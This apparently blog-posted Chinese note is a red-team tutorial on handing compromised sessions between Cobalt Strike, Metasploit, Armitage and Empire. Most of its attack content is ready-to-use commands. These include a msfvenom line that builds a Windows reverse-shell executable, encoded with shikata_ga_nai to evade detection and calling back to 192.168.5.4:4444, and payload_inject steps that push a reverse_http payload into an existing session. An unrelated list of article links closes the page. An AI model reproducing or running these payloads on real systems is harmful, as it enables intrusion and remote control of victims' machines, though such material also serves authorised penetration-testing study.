cobalt strike笔记-CS与MSF,Armitage,Empire互转shell
2023-09-14 08:56:56 时间
0x01 Metasploit派生shell给Cobaltstrike
生成木马:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai succeeded with size 449 (iteration=3) x86/shikata_ga_nai succeeded with size 476 (iteration=4) x86/shikata_ga_nai chosen with final size 476 Payload size: 476 bytes Final size of exe file: 73802 bytes
msf派生给cs:
msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(payload_inject) > set DisablePayloadHandler true msf exploit(payload_inject) > set LHOST 192.168.5.4 msf exploit(payload_inject) > set LPORT 4444 msf exploit(payload_inject) > set SESSION 1 msf exploit(payload_inject) > exploit
然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
,并根据metasploit监听配置cobaltstrike的listener
cs派生给msf:
msf中开启相应的监听:
ps:
默认情况下,payload_inject执行之后会在本地产生一个新的handler,
由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置
set DisablePayloadHandler true
如果出现错误,PID does not actually exist,可以设置一下注入进程的pid。set pid 进程号
由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置
set DisablePayloadHandler true
如果出现错误,PID does not actually exist,可以设置一下注入进程的pid。set pid 进程号
0x02-Cobaltstrike与Armitage互转shell
首先在armitage中配置一个handler
payload要与cobaltstrike的foreign监听器选择相同协议
Armitage派生shell给cobaltstrike
选择armitage中的会话,右键,Access-->Pss Session
0x03-Cobaltstrike与Empire会话互转
(Empire) > help Commands ======== agents Jump to the Agents menu. creds Add/display credentials to/from the database. exit Exit Empire help Displays the help menu. list Lists active agents or listeners. listeners Interact with active listeners. reload Reload one (or all) Empire modules. reset Reset a global option (e.g. IP whitelists). searchmodule Search Empire module names/descriptions. set Set a global option (e.g. IP whitelists). show Show a global option (e.g. IP whitelists). usemodule Use an Empire module. usestager Use an Empire stager.
cobaltstrike添加foreign监听器,协议为http
empire收到会话
相关文章
- 学习笔记 – EasyUI官方网站演示[通俗易懂]
- AOP概念与原理 | Spring学习笔记2.1
- JBDC的基础----学习笔记
- TypeScript学习笔记(四)—— TypeScript提高
- STM32F103学习笔记三 串口通信
- 关于 Kubernetes中secret、configmap的一些笔记
- Rust学习笔记Day19 你真的了解集合容器吗?
- Servlet学习笔记详解编程语言
- MyBatis学习笔记(二) 关联关系详解编程语言
- Oracle三思笔记:解读复杂系统的智慧(oracle三思笔记)
- Linux脚本Shell编程:快速入门(linux脚本shell)
- 使用Shell实现MySQL监控:快速了解数据库状态!(shell监控mysql)
- Linux教程:如何开启Shell命令行界面(linux开启shell)
- 「Linux 背后的力量:Shell 编程」(shell与linux)
- 使用Shell脚本来操作Redis(shell写redis)